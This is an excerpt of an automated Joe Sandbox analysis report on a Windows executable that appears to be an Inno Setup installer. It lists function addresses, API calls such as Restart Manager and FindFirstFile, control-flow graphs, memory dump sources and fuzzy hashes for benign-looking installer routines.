                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                                                                                                                                                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                                                                                                                                                                  • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                                                                                                                                                  • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                  • API String ID: 2252812187-1888249752
                                                                                                                                                                                                                                  • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                                                                                                                                                  • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004502C0 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 45libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1642 4502c0-4502cd 1643 4502d3-4502e0 GetVersion 1642->1643 1644 45037c-450386 1642->1644 1643->1644 1645 4502e6-4502fc LoadLibraryA 1643->1645 1645->1644 1646 4502fe-450377 GetProcAddress * 6 1645->1646 1646->1644
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,RmStartSession), ref: 00450309
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,RmRegisterResources), ref: 0045031E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,RmGetList), ref: 00450333
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,RmShutdown), ref: 00450348
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,RmRestart), ref: 0045035D
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,RmEndSession), ref: 00450372
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoadVersion
                                                                                                                                                                                                                                  • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                                                                                                                                                                  • API String ID: 1968650500-3419246398
                                                                                                                                                                                                                                  • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                                                                                                                                                  • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00423C0C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1790 423c0c-423c40 1791 423c42-423c43 1790->1791 1792 423c74-423c8b call 423b68 1790->1792 1793 423c45-423c61 call 40b24c 1791->1793 1797 423cec-423cf1 1792->1797 1798 423c8d 1792->1798 1826 423c63-423c6b 1793->1826 1827 423c70-423c72 1793->1827 1802 423cf3 1797->1802 1803 423d27-423d2c 1797->1803 1800 423c93-423c96 1798->1800 1801 423d50-423d60 1798->1801 1806 423cc5-423cc8 1800->1806 1807 423c98 1800->1807 1810 423d62-423d67 1801->1810 1811 423d6b-423d73 call 424194 1801->1811 1804 423fb1-423fb9 1802->1804 1805 423cf9-423d01 1802->1805 1808 423d32-423d35 1803->1808 1809 42409a-4240a8 IsIconic 1803->1809 1815 424152-42415a 1804->1815 1821 423fbf-423fca call 4181e0 1804->1821 1813 423f13-423f3a SendMessageA 1805->1813 1814 423d07-423d0c 1805->1814 1822 423da9-423db0 1806->1822 1823 423cce-423ccf 1806->1823 1817 423df6-423e06 call 423b84 1807->1817 1818 423c9e-423ca1 1807->1818 1819 4240d6-4240eb call 424850 1808->1819 1820 423d3b-423d3c 1808->1820 1809->1815 1816 4240ae-4240b9 GetFocus 1809->1816 1824 423d78-423d80 call 4241dc 1810->1824 1825 423d69-423d8c call 423b84 1810->1825 1811->1815 1813->1815 1829 423d12-423d13 1814->1829 1830 42404a-424055 1814->1830 1831 424171-424177 1815->1831 1816->1815 1838 4240bf-4240c8 call 41eff4 1816->1838 1817->1815 1839 423ca7-423caa 1818->1839 1840 423e1e-423e3a PostMessageA call 423b84 1818->1840 1819->1815 1833 423d42-423d45 1820->1833 1834 4240ed-4240f4 1820->1834 1821->1815 1882 423fd0-423fdf call 4181e0 IsWindowEnabled 1821->1882 1822->1815 1843 423db6-423dbd 1822->1843 1844 423cd5-423cd8 1823->1844 1845 423f3f-423f46 1823->1845 1824->1815 1825->1815 1826->1831 1827->1792 1827->1793 1846 424072-42407d 1829->1846 1847 423d19-423d1c 1829->1847 1830->1815 1849 42405b-42406d 1830->1849 1850 424120-424127 1833->1850 1851 423d4b 1833->1851 1860 4240f6-424109 call 4244d4 1834->1860 1861 42410b-42411e call 42452c 1834->1861 1838->1815 1895 4240ce-4240d4 SetFocus 1838->1895 1857 423cb0-423cb3 1839->1857 1858 423ea5-423eac 1839->1858 1840->1815 1843->1815 1863 423dc3-423dc9 1843->1863 1864 423cde-423ce1 1844->1864 1865 423e3f-423e5f call 423b84 1844->1865 1845->1815 1853 423f4c-423f51 call 404e54 1845->1853 1846->1815 1871 424083-424095 1846->1871 1868 423d22 1847->1868 1869 423f56-423f5e 1847->1869 1849->1815 1866 42413a-424149 1850->1866 1867 424129-424138 1850->1867 1870 42414b-42414c call 423b84 1851->1870 1853->1815 1877 423cb9-423cba 1857->1877 1878 423dce-423ddc IsIconic 1857->1878 1879 423eae-423ec1 call 423b14 1858->1879 1880 423edf-423ef0 call 423b84 1858->1880 1860->1815 1861->1815 1863->1815 1883 423ce7 1864->1883 1884 423e0b-423e19 call 424178 1864->1884 1910 423e83-423ea0 call 423a84 PostMessageA 1865->1910 1911 423e61-423e7e call 423b14 PostMessageA 1865->1911 1866->1815 1867->1815 1868->1870 1869->1815 1893 423f64-423f6b 1869->1893 1906 424151 1870->1906 1871->1815 1896 423cc0 1877->1896 1897 423d91-423d99 1877->1897 1886 423dea-423df1 call 423b84 1878->1886 1887 423dde-423de5 call 423bc0 1878->1887 1924 423ed3-423eda call 423b84 1879->1924 1925 423ec3-423ecd call 41ef58 1879->1925 1918 423ef2-423ef8 call 41eea4 1880->1918 1919 423f06-423f0e call 423a84 1880->1919 1882->1815 1915 423fe5-423ff4 call 4181e0 IsWindowVisible 1882->1915 1883->1870 1884->1815 1886->1815 1887->1815 1893->1815 1909 423f71-423f80 call 4181e0 IsWindowEnabled 1893->1909 1895->1815 1896->1870 1897->1815 1912 423d9f-423da4 call 422c4c 1897->1912 1906->1815 1909->1815 1939 423f86-423f9c call 412310 1909->1939 1910->1815 1911->1815 1912->1815 1915->1815 1941 423ffa-424045 GetFocus call 4181e0 SetFocus call 415240 SetFocus 1915->1941 1937 423efd-423f00 1918->1937 1919->1815 1924->1815 1925->1924 1937->1919 1939->1815 1946 423fa2-423fac 1939->1946 1941->1815 1946->1815
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a28984740dc304245bcd2a14d03171be1c7e595ca527b28cdbc91bc5dc42f766
                                                                                                                                                                                                                                  • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a28984740dc304245bcd2a14d03171be1c7e595ca527b28cdbc91bc5dc42f766
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004673A4 Relevance: 15.6, APIs: 4, Strings: 4, Instructions: 1649windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 2133 4673a4-4673ba 2134 4673c4-46747b call 49577c call 402b30 * 6 2133->2134 2135 4673bc-4673bf call 402d30 2133->2135 2152 46747d-4674a4 call 41463c 2134->2152 2153 4674b8-4674d1 2134->2153 2135->2134 2157 4674a6 2152->2157 2158 4674a9-4674b3 call 4145fc 2152->2158 2159 4674d3-4674fa call 41461c 2153->2159 2160 46750e-46751c call 495a84 2153->2160 2157->2158 2158->2153 2166 4674ff-467509 call 4145dc 2159->2166 2167 4674fc 2159->2167 2168 46751e-46752d call 4958cc 2160->2168 2169 46752f-467531 call 4959f0 2160->2169 2166->2160 2167->2166 2174 467536-467589 call 4953e0 call 41a3d0 * 2 2168->2174 2169->2174 2181 46759a-4675af call 451458 call 414b18 2174->2181 2182 46758b-467598 call 414b18 2174->2182 2188 4675b4-4675bb 2181->2188 2182->2188 2189 467603-467a89 call 49581c call 495b40 call 41461c * 3 call 4146bc call 4145dc * 3 call 460bfc call 460c14 call 460c20 call 460c68 call 460bfc call 460c14 call 460c20 call 460c68 call 460c14 call 460c68 LoadBitmapA call 41d6b0 call 460c38 call 460c50 call 467180 call 468c94 call 466800 call 40357c call 414b18 call 466b38 call 466b40 call 466800 call 40357c * 2 call 414b18 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 414b18 * 2 call 468c94 call 414b18 * 2 call 466b38 call 4145fc call 466b38 call 4145fc call 468c94 call 414b18 call 466b38 call 466b40 call 468c94 call 414b18 call 466b38 call 4145fc * 2 call 414b18 call 466b38 call 4145fc 2188->2189 2190 4675bd-4675fe call 4146bc call 414700 call 420f98 call 420fc4 call 420b68 call 420b94 2188->2190 2320 467ae5-467afe call 414a44 * 2 2189->2320 2321 467a8b-467ae3 call 4145fc call 414b18 call 466b38 call 4145fc 2189->2321 2190->2189 2328 467b03-467bb4 call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2320->2328 2321->2328 2347 467bb6-467bd1 2328->2347 2348 467bee-467e24 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 4181e0 call 42ed38 call 414b18 call 49581c call 495b40 call 41461c call 466800 call 414b18 call 466b38 call 4145fc call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 4145fc call 466b40 call 466800 call 414b18 call 466b38 2328->2348 2349 467bd6-467be9 call 4145fc 2347->2349 2350 467bd3 2347->2350 2409 467e26-467e2f 2348->2409 2410 467e65-467f1e call 466800 call 468c94 call 466800 call 414b18 call 495b40 call 466b38 2348->2410 2349->2348 2350->2349 2409->2410 2411 467e31-467e60 call 414a44 call 466b40 2409->2411 2428 467f20-467f3b 2410->2428 2429 467f58-468379 call 466800 call 414b18 call 495b50 * 2 call 42e8c0 call 4145fc call 466b38 call 4145fc call 414b18 call 49581c call 495b40 call 41461c call 414b18 call 466800 call 468c94 call 466800 call 414b18 call 466b38 call 466b40 call 42bbd0 call 495b50 call 44e8b0 call 466800 call 468c94 call 466800 call 468c94 call 466800 call 468c94 * 2 call 414b18 call 466b38 call 466b40 call 468c94 call 4953e0 call 41a3d0 call 466800 call 40357c call 414b18 call 466b38 call 4145fc call 414b18 * 2 call 495b50 call 403494 call 40357c * 2 call 414b18 2410->2429 2411->2410 2430 467f40-467f53 call 4145fc 2428->2430 2431 467f3d 2428->2431 2528 46839d-4683a4 2429->2528 2529 46837b-468398 call 44ffdc call 450138 2429->2529 2430->2429 2431->2430 2531 4683a6-4683c3 call 44ffdc call 450138 2528->2531 2532 4683c8-4683cf 2528->2532 2529->2528 2531->2532 2534 4683f3-468439 call 4181e0 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 468d88 2532->2534 2535 4683d1-4683ee call 44ffdc call 450138 2532->2535 2549 468453 2534->2549 2550 46843b-468442 2534->2550 2535->2534 2553 468455-468464 2549->2553 2551 468444-46844d 2550->2551 2552 46844f-468451 2550->2552 2551->2549 2551->2552 2552->2553 2554 468466-46846d 2553->2554 2555 46847e 2553->2555 2556 46846f-468478 2554->2556 2557 46847a-46847c 2554->2557 2558 468480-46849a 2555->2558 2556->2555 2556->2557 2557->2558 2559 468543-46854a 2558->2559 2560 4684a0-4684a9 2558->2560 2563 468550-468573 call 47c26c call 403450 2559->2563 2564 4685dd-4685eb call 414b18 2559->2564 2561 468504-46853e call 414b18 * 3 2560->2561 2562 4684ab-468502 call 47c26c call 414b18 call 47c26c call 414b18 call 47c26c call 414b18 2560->2562 2561->2559 2562->2559 2583 468584-468598 call 403494 2563->2583 2584 468575-468582 call 47c440 2563->2584 2570 4685f0-4685f9 2564->2570 2574 4685ff-468617 call 429fd8 2570->2574 2575 468709-468738 call 42b96c call 44e83c 2570->2575 2592 46868e-468692 2574->2592 2593 468619-46861d 2574->2593 2609 4687e6-4687ea 2575->2609 2610 46873e-468742 2575->2610 2605 4685aa-4685db call 42c804 call 42cbc0 call 403494 call 414b18 2583->2605 2606 46859a-4685a5 call 403494 2583->2606 2584->2605 2598 468694-46869d 2592->2598 2599 4686e2-4686e6 2592->2599 2600 46861f-468659 call 40b24c call 47c26c 2593->2600 2598->2599 2607 46869f-4686aa 2598->2607 2603 4686fa-468704 call 42a05c 2599->2603 2604 4686e8-4686f8 call 42a05c 2599->2604 2660 46865b-468662 2600->2660 2661 468688-46868c 2600->2661 2603->2575 2604->2575 2605->2570 2606->2605 2607->2599 2619 4686ac-4686b0 2607->2619 2612 4687ec-4687f3 2609->2612 2613 468869-46886d 2609->2613 2611 468744-468756 call 40b24c 2610->2611 2639 468788-4687bf call 47c26c call 44cb0c 2611->2639 2640 468758-468786 call 47c26c call 44cbdc 2611->2640 2612->2613 2622 4687f5-4687fc 2612->2622 2623 4688d6-4688df 2613->2623 2624 46886f-468886 call 40b24c 2613->2624 2628 4686b2-4686d5 call 40b24c call 406ac4 2619->2628 2622->2613 2633 4687fe-468809 2622->2633 2631 4688e1-4688f9 call 40b24c call 4699fc 2623->2631 2632 4688fe-468913 call 466ee0 call 466c5c 2623->2632 2654 4688c6-4688d4 call 4699fc 2624->2654 2655 468888-4688c4 call 40b24c call 4699fc * 2 call 46989c 2624->2655 2671 4686d7-4686da 2628->2671 2672 4686dc-4686e0 2628->2672 2631->2632 2685 468965-46896f call 414a44 2632->2685 2686 468915-468938 call 42a040 call 40b24c 2632->2686 2633->2632 2642 46880f-468813 2633->2642 2687 4687c4-4687c8 2639->2687 2640->2687 2653 468815-46882b call 40b24c 2642->2653 2682 46885e-468862 2653->2682 2683 46882d-468859 call 42a05c call 4699fc call 46989c 2653->2683 2654->2632 2655->2632 2660->2661 2673 468664-468676 call 406ac4 2660->2673 2661->2592 2661->2600 2671->2599 2672->2599 2672->2628 2673->2661 2696 468678-468682 2673->2696 2682->2653 2688 468864 2682->2688 2683->2632 2697 468974-468993 call 414a44 2685->2697 2711 468943-468952 call 414a44 2686->2711 2712 46893a-468941 2686->2712 2694 4687d3-4687d5 2687->2694 2695 4687ca-4687d1 2687->2695 2688->2632 2701 4687dc-4687e0 2694->2701 2695->2694 2695->2701 2696->2661 2702 468684 2696->2702 2713 468995-4689b8 call 42a040 call 469b5c 2697->2713 2714 4689bd-4689e0 call 47c26c call 403450 2697->2714 2701->2609 2701->2611 2702->2661 2711->2697 2712->2711 2717 468954-468963 call 414a44 2712->2717 2713->2714 2730 4689e2-4689eb 2714->2730 2731 4689fc-468a05 2714->2731 2717->2697 2730->2731 2732 4689ed-4689fa call 47c440 2730->2732 2733 468a07-468a19 call 403684 2731->2733 2734 468a1b-468a2b call 403494 2731->2734 2741 468a3d-468a54 call 414b18 2732->2741 2733->2734 2742 468a2d-468a38 call 403494 2733->2742 2734->2741 2746 468a56-468a5d 2741->2746 2747 468a8a-468a94 call 414a44 2741->2747 2742->2741 2748 468a5f-468a68 2746->2748 2749 468a6a-468a74 call 42b0e4 2746->2749 2753 468a99-468abe call 403400 * 3 2747->2753 2748->2749 2751 468a79-468a88 call 414a44 2748->2751 2749->2751 2751->2753
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                                                                                                                                                                  • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                                                                                                                                                                    • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                                                                                                                                                                    • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                                                                                                                                    • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                                                                                                                                    • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                                                                                                                                    • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                                                                                                                                    • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                                                                                                                                                                    • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                                                                                                                                                    • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                                                                                                                                                    • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                                                                                                                                                                    • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                                                                                                                                                                    • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                                                                                                                                                                    • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                                                                                                                                                                  • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,020C0BB0,020C2910,?,?,020C2940,?,?,020C2990,?), ref: 004683FD
                                                                                                                                                                                                                                  • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                                                                                                                                                                  • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                                                                                                                                                                    • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                                                                                                                                                                  • String ID: $(Default)$STOPIMAGE$%H
                                                                                                                                                                                                                                  • API String ID: 3231140908-2624782221
                                                                                                                                                                                                                                  • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                                                                                                                                  • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00474F88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                  • String ID: unins$unins???.*
                                                                                                                                                                                                                                  • API String ID: 3541575487-1009660736
                                                                                                                                                                                                                                  • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                                                                                                                                  • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00452A60 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 873889042-0
